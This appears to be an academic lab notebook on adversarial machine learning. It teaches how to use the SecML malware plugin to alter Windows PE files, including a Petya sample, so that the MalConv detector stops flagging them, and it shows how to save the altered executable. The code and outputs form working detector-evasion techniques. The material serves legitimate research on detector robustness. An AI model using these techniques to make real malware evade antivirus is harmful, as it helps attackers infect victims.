# Adversarial EXEmples: evasion attacks against Windows malware detectors

In this laboratory, you will learn how to use SecML to create adversarial examples against Windows malware detectors implemented with machine learning techniques. To do so, we will use [SecML malware](https://github.com/pralab/secml_malware), a SecML plugin that contains most of the strategies developed to evade such detectors.

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](
https://colab.research.google.com/github/zangobot/teaching_material/blob/main/03-AdversarialEXEmples.ipynb)

In [None]:
try:
    import secml_malware
except ImportError:
    %pip install git+https://github.com/elastic/ember
    %pip install git+https://github.com/pralab/secml_malware

# The Windows PE file format
Before explaining the attacks, we recall how Windows programs are stored as files, following the [Windows Portable Executable (PE)](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) file format.
Many Python libraries can dissect programs; one of the best is [lief](https://github.com/lief-project/LIEF).
It is also used inside `secml-malware` to perturb samples, as shown later in this tutorial.
Opening an executable is straightforward:

In [None]:
import lief

exe_path = 'assets/calc.exe'
exe_object: lief.PE.Binary = lief.parse(exe_path)
print(exe_object)

Now `exe_object` contains all the information about the loaded program.
We can inspect each of its components. For instance, here is how you can read the header metadata and list the sections:

In [None]:
print('DOS Header')
print(exe_object.dos_header)

print('PE Header')
print(exe_object.header)

print('Optional Header')
print(exe_object.optional_header)

print('Sections')
for s in exe_object.sections:
    print(s.name, s.characteristics_lists)
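
To make the role of the DOS header more concrete, here is a minimal sketch that reads its two key fields by hand with the standard `struct` module instead of lief. The helper `read_dos_header` and the synthetic `toy` buffer are hypothetical names introduced only for illustration; the buffer is not a runnable program.

```python
import struct


def read_dos_header(data: bytes) -> dict:
    """Return the DOS-header fields needed to locate the PE header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ magic number")
    # e_lfanew: little-endian 32-bit offset of the PE signature, stored at 0x3C
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return {"e_magic": data[:2], "e_lfanew": e_lfanew}


# Synthetic buffer (illustration only): MZ magic, zero filler,
# e_lfanew pointing at offset 0x80, then the PE signature.
toy = bytearray(0x80)
toy[:2] = b"MZ"
struct.pack_into("<I", toy, 0x3C, 0x80)
toy += b"PE\x00\x00"

header = read_dos_header(bytes(toy))
print(header)
```

Everything between the magic number and the `e_lfanew` pointer is zero in this toy buffer and the check still passes, which hints at why those bytes are a convenient place to inject a perturbation.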

This library is also very useful for manipulating EXEs.
For instance, in a few lines of code you can add a section to a program.

In [None]:
# Create the new section and name it. Size constraint: the name can be at most 8 bytes!
new_section: lief.PE.Section = lief.PE.Section()
new_section.name = '.newsec'
new_section.content = [ord(i) for i in "This is my newly created section"]
new_section.characteristics = lief.PE.SECTION_CHARACTERISTICS.MEM_DISCARDABLE
exe_object.add_section(new_section)

# New section in place! Now we use lief to rebuild the binary.
builder = lief.PE.Builder(exe_object)
builder.build()
exe_object = lief.PE.parse(builder.get_build())
print('Sections')
for s in exe_object.sections:
    print(s.name, s.characteristics_lists)
builder.write('new_exe.file')

As you can see, the new section appears as the last one.
More information on how to use lief is available in the [documentation of the library](https://lief-project.github.io/doc/stable/index.html).
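
The 8-byte limit on the section name comes from the PE section header, where the name is a fixed 8-byte field padded with null bytes. The following sketch shows that encoding in plain Python; `encode_section_name` is a hypothetical helper, not part of lief.

```python
def encode_section_name(name: str) -> bytes:
    """Encode a section name into the fixed 8-byte, null-padded header field."""
    raw = name.encode("ascii")
    if len(raw) > 8:
        raise ValueError(f"section name {name!r} is longer than 8 bytes")
    # Shorter names are right-padded with null bytes up to 8 bytes
    return raw.ljust(8, b"\x00")


field = encode_section_name(".newsec")
print(field)
```

A name such as `.mynewsection` would raise a `ValueError` here, which mirrors the constraint mentioned in the comment of the cell above.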

# Evasion of End-to-end Deep Neural Network for Malware Detection

In this tutorial, you will learn how to use this plugin to test the already implemented attacks against a PyTorch network of your choice.

In [1]:
import os
import magic
from secml.array import CArray

from secml_malware.models.malconv import MalConv
from secml_malware.models.c_classifier_end2end_malware import CClassifierEnd2EndMalware, End2EndModel

net = MalConv()
net = CClassifierEnd2EndMalware(net)
net.load_pretrained_model()

First, we create the network (MalConv) and wrap it with the *CClassifierEnd2EndMalware* model class.
This object generalizes PyTorch end-to-end ML models.
Since MalConv is already implemented inside the plugin, its pretrained weights are shipped as well, and they can be loaded with the *load_pretrained_model* method.

If you wish to use different weights, pass the path to the PyTorch *pth* file to that method.

In [2]:
from secml_malware.attack.whitebox.c_header_evasion import CHeaderEvasion

partial_dos = CHeaderEvasion(net, random_init=False, iterations=50, optimize_all_dos=False, threshold=0.5)

This is how an attack is created; no further action is needed.
The `random_init` parameter specifies whether the bytes should be assigned random values before the optimization starts, `iterations` sets the number of steps of the attack, `optimize_all_dos` selects whether the whole DOS header should be perturbed or just the first 58 bytes, and `threshold` is the detection threshold used as a stopping condition.

The attack stops as soon as the confidence drops below `threshold`. If you want to see how far the attack can degrade the network's confidence, set `threshold` to 0.
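
The byte ranges targeted by the two variants can be sketched as follows. This is an assumption about the editable regions, not the plugin's code: the partial variant is taken to cover the bytes between the `MZ` magic number and the `e_lfanew` pointer at offset `0x3C` (which is consistent with the 58 bytes mentioned above), and the full variant is assumed to add the bytes between that pointer and the PE signature. `editable_dos_indexes` and `toy` are hypothetical names.

```python
import struct

MZ_MAGIC_END = 2         # bytes 0-1 hold the "MZ" magic number
E_LFANEW_OFFSET = 0x3C   # bytes 0x3C-0x3F hold the offset of the PE header


def editable_dos_indexes(data: bytes, optimize_all_dos: bool) -> list:
    """Return the byte positions a DOS-header attack could overwrite (assumed)."""
    partial = list(range(MZ_MAGIC_END, E_LFANEW_OFFSET))
    if not optimize_all_dos:
        return partial
    # Assumed full variant: also edit the bytes after the pointer, up to the PE header
    (pe_offset,) = struct.unpack_from("<I", data, E_LFANEW_OFFSET)
    return partial + list(range(E_LFANEW_OFFSET + 4, pe_offset))


# Synthetic DOS header whose PE header starts at offset 0x80 (illustration only)
toy = bytearray(0x80)
toy[:2] = b"MZ"
struct.pack_into("<I", toy, E_LFANEW_OFFSET, 0x80)

partial_idx = editable_dos_indexes(bytes(toy), optimize_all_dos=False)
full_idx = editable_dos_indexes(bytes(toy), optimize_all_dos=True)
print(len(partial_idx), len(full_idx))
```

In both cases the magic number and the pointer are left untouched, since the program could no longer be loaded if they were altered.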

In [3]:
folder = "secml_malware/data/malware_samples/test_folder"
X = []
y = []
file_names = []
for f in os.listdir(folder):
    path = os.path.join(folder, f)
    if 'petya' not in path:
        continue
    if "PE32" not in magic.from_file(path):
        continue
    with open(path, "rb") as file_handle:
        code = file_handle.read()
    x = End2EndModel.bytes_to_numpy(
        code, net.get_input_max_length(), 256, False
    )
    _, confidence = net.predict(CArray(x), True)

    if confidence[0, 1].item() < 0.5:
        continue

    print(f"> Added {f} with confidence {confidence[0,1].item()}")
    X.append(x)
    conf = confidence[0, 1].item()
    y.append([1 - conf, conf])
    file_names.append(path)

> Added petya.file with confidence 0.9112271666526794


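We load a simple dataset from the `malware_samples/test_folder` folder, which you should have filled with malware to test the attacks.
For this example we keep only the `petya` sample, and we discard every file that is not a PE32 executable or that the network does not already flag as malware (confidence below 0.5).
The `CArray` class is the base object you will handle when dealing with vectors in this library.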
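
The call to `End2EndModel.bytes_to_numpy` in the loop above turns the raw file into a fixed-length vector for the network. The sketch below is a pure-Python analogue under the assumption that the arguments mean "maximum length", "padding value", and "do not shift the byte values"; `encode_bytes` is a hypothetical helper and not the plugin's implementation.

```python
def encode_bytes(data: bytes, max_length: int, padding_value: int = 256) -> list:
    """Truncate or pad a byte string to exactly max_length integer values."""
    values = list(data[:max_length])
    # 256 lies outside the byte range 0-255, so padding cannot be confused with content
    values += [padding_value] * (max_length - len(values))
    return values


encoded = encode_bytes(b"MZ\x90", max_length=6)
print(encoded)  # [77, 90, 144, 256, 256, 256]

truncated = encode_bytes(b"ABCDEFGH", max_length=4)
print(truncated)  # [65, 66, 67, 68]
```

Files shorter than the input length are padded, and longer ones are cut, so every sample reaches the network with the same shape.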

In [4]:
for sample, label in zip(X, y):
    y_pred, adv_score, adv_ds, f_obj = partial_dos.run(CArray(sample), CArray(label[1]))
    print(partial_dos.confidences_)
    print(f_obj)

[0.9112271666526794, 0.06050172820687294]
0.06050172820687294


Inside the `adv_ds` object, you can find the adversarial example computed by the attack.
You can reconstruct a functioning executable from it by using a dedicated function of the plugin:

In [5]:
adv_x = adv_ds.X[0,:]
real_adv_x = partial_dos.create_real_sample_from_adv(file_names[0], adv_x)
print(len(real_adv_x))
real_x = End2EndModel.bytes_to_numpy(real_adv_x, net.get_input_max_length(), 256, False)
_, confidence = net.predict(CArray(real_x), True)
print(confidence[0,1].item())

806912
0.06050172820687294


... and you're done!
If you want to create a real sample (stored on disk), have a look at the `create_real_sample_from_adv` method of each attack: it accepts a third string argument that is used as the destination file path for the adversarial example.
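
Conceptually, rebuilding the real sample means copying the optimized values back into the original file at the positions the attack was allowed to edit. The sketch below illustrates this idea only; `apply_adversarial_bytes` is a hypothetical helper, and the editable range is the assumed partial DOS region, not something read from the plugin.

```python
def apply_adversarial_bytes(original: bytes, adv_vector, indexes) -> bytes:
    """Overwrite the chosen positions of the original file with adversarial values."""
    patched = bytearray(original)
    for i in indexes:
        patched[i] = int(adv_vector[i])
    return bytes(patched)


# Toy 64-byte "file": MZ magic followed by zeros (illustration only)
original = b"MZ" + bytes(62)
indexes = range(2, 0x3C)            # assumed editable region of the DOS header
adv_vector = list(original)
for i in indexes:
    adv_vector[i] = 0x41            # pretend the attack chose the byte 'A' everywhere

patched = apply_adversarial_bytes(original, adv_vector, indexes)
print(patched[:8])
```

The file length is unchanged and every byte outside the editable region is preserved.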

## Bonus: more attacks!
We used only one attack, the Partial DOS one. But what if we want to use others?
Easy peasy! Just open the [source code](https://github.com/pralab/secml_malware/tree/master/secml_malware/attack/whitebox) or the [documentation](https://secml-malware.readthedocs.io/en/docs/source/secml_malware.attack.whitebox.html) of the other white-box attacks, and instantiate the one you like!
Let's use the [FGSM attack](https://arxiv.org/abs/1802.04528), for instance:

In [6]:
from secml_malware.attack.whitebox import CKreukEvasion

fgsm = CKreukEvasion(net, how_many_padding_bytes=2048, epsilon=1.0, iterations=5)
for i, (sample, label) in enumerate(zip(X, y)):
    y_pred, adv_score, adv_ds, f_obj = fgsm.run(CArray(sample), CArray(label[1]))
    print(fgsm.confidences_)
    print(f_obj)
    # adv_ds holds only the sample attacked in this iteration, hence row 0
    real_adv_x = fgsm.create_real_sample_from_adv(file_names[i], adv_ds.X[0, :])
    with open(file_names[i], 'rb') as f:
        print('Original length: ', len(f.read()))
    print('Adversarial sample length: ', len(real_adv_x))


[0.9112271666526794, 0.67103111743927, 0.0]
1.1346487553964835e-05
Original length:  806912
Adversarial sample length:  808960
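
The difference between the two lengths printed above equals `how_many_padding_bytes`. A minimal sketch of that arithmetic, assuming the padding is simply appended at the end of the file (`append_padding` is a hypothetical helper, and the zero-filled buffer only stands in for the real sample):

```python
def append_padding(data: bytes, padding: bytes) -> bytes:
    """Return the original content followed by the padding bytes."""
    return data + padding


original_length = 806912
how_many_padding_bytes = 2048

toy = bytes(original_length)  # stand-in for the original file content
adv = append_padding(toy, bytes([0x41]) * how_many_padding_bytes)
print(len(adv))  # 808960
```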


... and you're done! Remember that this particular attack might take a while, depending on how many bytes the algorithm is tasked to edit and on the number of iterations.
In the meantime, **happy coding with SecML Malware!**